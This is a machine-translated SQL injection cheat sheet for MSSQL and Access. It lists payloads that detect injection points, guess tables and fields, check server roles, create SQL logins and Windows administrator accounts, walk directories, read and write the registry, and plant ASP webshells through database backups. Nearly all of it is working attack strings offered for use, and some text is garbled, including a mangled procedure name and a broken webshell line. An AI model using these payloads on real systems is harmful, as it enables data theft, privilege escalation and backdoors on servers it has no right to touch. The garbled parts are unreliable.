1. Determine whether injection exists.
; And 1 = 1
; And 1 = 2
2. Determine whether it is mssql.
; And user> 0
3. The injection parameter is a character.
And [query condition] and ''='
4. parameters are not filtered during search.
'And [query condition] and' % 25' ='
5. Determine the Database System
; And (select count (*) from sysobjects)> 0 mssql
; And (select count (*) from msysobjects)> 0 access
6. Guess the database
; And (Select Count (*) from [database name])> 0
7. Guess the field
; And (Select Count (field name) from database name)> 0
8. Length of records in the guess Field
; And (select top 1 len (field name) from database name)> 0
9. (1) obtain the ascii value of a field (access)
; And (select top 1 asc (mid (field name, 1, 1) from database name)> 0
(2) Guess the ascii value of a field (mssql)
; And (select top 1 unicode (substring (field name, 1, 1) from database name)> 0
10. Test the permission structure (mssql)
; And 1 = (Select IS_SRVROLEMEMBER ('sysadmin '));--
; And 1 = (Select IS_SRVROLEMEMBER ('serveradmin '));--
; And 1 = (Select IS_SRVROLEMEMBER ('setupadmin '));--
; And 1 = (Select IS_SRVROLEMEMBER ('securityadmin '));--
; And 1 = (Select IS_SRVROLEMEMBER ('diskadmin '));--
; And 1 = (Select IS_SRVROLEMEMBER ('bulkadmin '));--
; And 1 = (Select IS_MEMBER ('db _ owner '));--
11. add mssql and system accounts
; Exec master. dbo. sp_addlogin username ;--
; Exec master. dbo. sp_password null, username, password ;--
; Exec master. dbo. sp_addsrvrolemember sysadmin username ;--
; Exec master. dbo. xp_mongoshell 'net user username password/workstations: */times: all/passwordchg: yes/passwordreq: yes/active: yes/add ';--
; Exec master. dbo. xp_mongoshell 'net user username password/add ';--
; Exec master. dbo. xp_mongoshell 'net localgroup administrators username/add ';--
12. (1) traverse the directory
; Create table dirs (paths varchar (100), id int)
; Insert dirs exec master. dbo. xp_dirtree 'C :\'
; And (select top 1 paths from dirs)> 0
; And (select top 1 paths from dirs where paths not in ('obtained paths ')>)
(2) traverse directories
; Create table temp (id nvarchar (255), num1 nvarchar (255), num2 nvarchar (255), num3 nvarchar (255 ));--
; Insert temp exec master. dbo. xp_availablemedia; -- get all current drives
; Insert into temp (id) exec master. dbo. xp_subdirs 'C: \ '; -- get the subdirectory list
; Insert into temp (id, num1) exec master. dbo. xp_dirtree 'C: \ '; -- get the directory tree structure of all subdirectories
; Insert into temp (id) exec master. dbo. xp_mongoshell 'Type c: \ web \ index. asp '; -- view the File Content
13. mssql Stored Procedures
Xp_regenumvalues registry Root Key, subkey
; Exec xp_regenumvalues 'HKEY _ LOCAL_MACHINE ', 'Software \ Microsoft \ Windows \ CurrentVersion \ run' returns all key values in multiple Record Sets
Xp_regread Root Key, subkey, key value name
; Exec xp_regread 'HKEY _ LOCAL_MACHINE ', 'Software \ Microsoft \ Windows \ currentversion', 'commonfilesdir', return the value of the specified key
Xp_regwrite Root Key, subkey, Value Name, value type, Value
There are two value types: REG_SZ and REG_DWORD.
; Exec xp_regwrite 'HKEY _ LOCAL_MACHINE ', 'Software \ Microsoft \ Windows \ currentversion ',
'Testvaluename', 'reg _ sz ', 'Hello' write to the Registry
Xp_regdeletevalue Root Key, subkey, Value Name
Exec xp_regdeletevalue 'HKEY _ LOCAL_MACHINE ', 'Software \ Microsoft \ Windows \ currentversion', 'testvaluename' delete a value
Xp_regdeletekey 'HKEY _ LOCAL_MACHINE ', 'Software \ Microsoft \ Windows \ CurrentVersion \ testkey' delete key, including all values under this key
14. mssql backup creates webshell
Use model
Create table cmd (str image );
Insert into cmd (str) values ('<% Dim oScript %> ');
Backup database model to disk = 'C: \ l. asp ';
15. mssql built-in functions
; And (select @ version)> 0 to get the Windows version number
; And user_name () = 'dbo' determine whether the user connected to the current system is sa
; And (select user_name ()> 0 blow the user connected to the current system
; And (select db_name ()> 0 to get the database currently connected
16. Simple webshell
Use model
Create table cmd (str image );
Insert into cmd (str) values ('<% = server. createobject ("wscript. shell "cmd.exe c (" cmd.exe/c "& request (" c ")). stdout. readall %> ');
Backup database model to disk = 'G: \ wwwtest \ l. asp ';